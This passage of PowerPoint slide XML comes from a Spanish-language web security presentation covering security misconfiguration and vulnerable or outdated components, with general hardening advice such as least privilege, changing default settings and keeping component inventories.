              </a:rPr>
              <a:t>funciones innecesarias o predeterminadas.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 4978">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B524BC58-07BA-93C2-3FDF-5880A76E5DAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1731408" y="4872162"/>
            <a:ext cx="7189774" cy="758813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
              <ma14:wrappingTextBoxFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" xmlns:lc="http://schemas.openxmlformats.org/drawingml/2006/lockedCanvas" xmlns="" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="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Evitar el uso de plataformas sin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>características</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> componentes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> documentación </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> muestras innecesarias</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, revisión y actualización de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>configuraciones adecuadas</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17" name="Oval 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ED87FFB-89BF-2ECD-5F10-46143D3E0007}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520933" y="3328137"/>
            <a:ext cx="900000" cy="9000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b="1">
              <a:latin typeface="Raleway" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Oval 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA997DD1-9BF8-B835-7617-CE6AD3F0E248}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520933" y="1674530"/>
            <a:ext cx="911696" cy="9000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b="1">
              <a:latin typeface="Raleway" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Imagen 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7888DDC6-8C30-7418-5873-7994B2E4E5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879" y="5104023"/>
            <a:ext cx="512108" cy="512108"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Imagen 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F350E78-4C14-39DC-383A-F696B9009A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879" y="3522083"/>
            <a:ext cx="512108" cy="512108"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Imagen 22" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C376E0D-947F-7437-A6BD-270D61D2CF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307" y="1880690"/>
            <a:ext cx="494018" cy="487680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Imagen 23" descr="Una mano muestra un teclado de computadora&#10;&#10;Descripción generada automáticamente con confianza media">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FDA48ED-E651-8A29-BAF4-8461E3EDF9ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="34916" r="26420" b="25555"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9090536" y="1610230"/>
            <a:ext cx="3101464" cy="4071370"/>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78A1ED3E-5526-2859-6771-8F456651237D}"/>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420028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651D5-10AF-C8B5-4F81-DD4164FA11E1}"/>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3B5525D-1274-0A5E-E2FA-73BAC2179486}"/>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B876517-BDF4-9E9A-F7C7-1AF04E93F485}"/>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05. Configuración de seguridad incorrecta</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BDF23FD-FD04-9AA9-0F13-EB6EA00BEA3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25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6746D3C0-4B86-8459-733C-D2262A828ABD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4432793" y="316979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5" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91A5400A-5754-AEB6-99D2-7BD99A5CB91A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5699866" y="1506185"/>
            <a:ext cx="5663352"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Configuración según guías bastionado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de sistema operativo, virtualización, servidor de aplicaciones/web, sistema gestor de base de datos, etc. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Modificar configuraciones por defecto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8913455D-CA9E-DD61-774D-8A919CE1077E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5699866" y="3399082"/>
            <a:ext cx="5776368"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Restringir el servidor web, los procesos y las cuentas de servicios con el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mínimo privilegio posible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A5CCA4F-9D4F-E90F-0399-36ADCC5BCDC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4432793" y="1605769"/>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9" name="Oval 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C86ECD2-10AA-9AF2-CD90-6ECF81EEF923}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4432793" y="4771923"/>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b="1">
              <a:latin typeface="Raleway" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61B2E835-DA17-2FFD-93BC-3240D82D7BDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5699866" y="5001208"/>
            <a:ext cx="5663352"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Eliminar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> todas las funcionalidades y archivos que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>no sean necesarios.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Imagen 10" descr="Un joven sentado en un escritorio&#10;&#10;Descripción generada automáticamente con confianza media">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A336CEDC-392C-9E7C-3835-E914D0A6767C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="20000" r="39982" b="27972"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1402457"/>
            <a:ext cx="3892924" cy="4671263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Imagen 11" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{188A3C34-00CA-F6FC-F9B0-48B48EE72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4750" y="1869650"/>
            <a:ext cx="609524" cy="609524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Imagen 12" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A37A85B-69A8-1625-DBF7-50A7188EAE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033" y="3406461"/>
            <a:ext cx="609600" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Imagen 13" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D1DDC66-22BE-8CF5-10A8-73B3C20A90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1998" y="5009789"/>
            <a:ext cx="609600" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5FB8BB9-B36B-3557-8E6F-0A8788D977E9}"/>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608516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02EE8-538A-DECB-5B75-F0182E1DE39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18823DB-E571-D573-4243-A7EB6237B6CA}"/>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2CD4672-083E-5D13-8D24-D6D7B55CCE9D}"/>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06. Componentes vulnerables y obsoletos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13B73DF1-D984-7509-ED43-215D1C5D0A1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17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EF55700-69FA-F4D9-0302-ADEC0CC4E1A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522498" y="1333068"/>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3" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60A44298-ADD4-DD1F-CCE6-884F83D900E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2016623" y="1333065"/>
            <a:ext cx="6602275"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Las aplicaciones y API que utilizan componentes con vulnerabilidades conocidas pueden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>socavar las defensas de la aplicación </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> permitir diversos ataques e impactos</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15" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A732C94-D5EE-64F0-F312-4B4DEC66BC33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522498" y="2919921"/>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16" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFF6DC59-1DFA-37E5-F5B6-31A9BB6C5770}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2016623" y="2872205"/>
            <a:ext cx="6602275" cy="1200329"/>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Desconocimiento de las </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>versiones</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> que se utilizan, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>falta de soporte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>actualización</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> del software, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>falta de comprobación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de la compatibilidad de las librerías actualizadas o parcheadas…</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FCE6C11-4BAD-E157-D66C-74269FA59F68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522498" y="4530268"/>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19" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{053BDF7D-DFB9-347A-61CE-786D656A943D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2016623" y="4556199"/>
            <a:ext cx="6738078"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Prevenir eliminando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dependencias no utilizadas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>características innecesarias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inventariar las versiones</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de los componentes, obtener componentes de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fuentes oficiales</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pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Imagen 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A31A85E-5045-01C5-0167-4FC8E80228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816" y="1587860"/>
            <a:ext cx="595313" cy="595313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Imagen 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90155642-9CAE-7AA2-BF34-9129F6A405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815" y="3174712"/>
            <a:ext cx="595313" cy="595313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Imagen 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
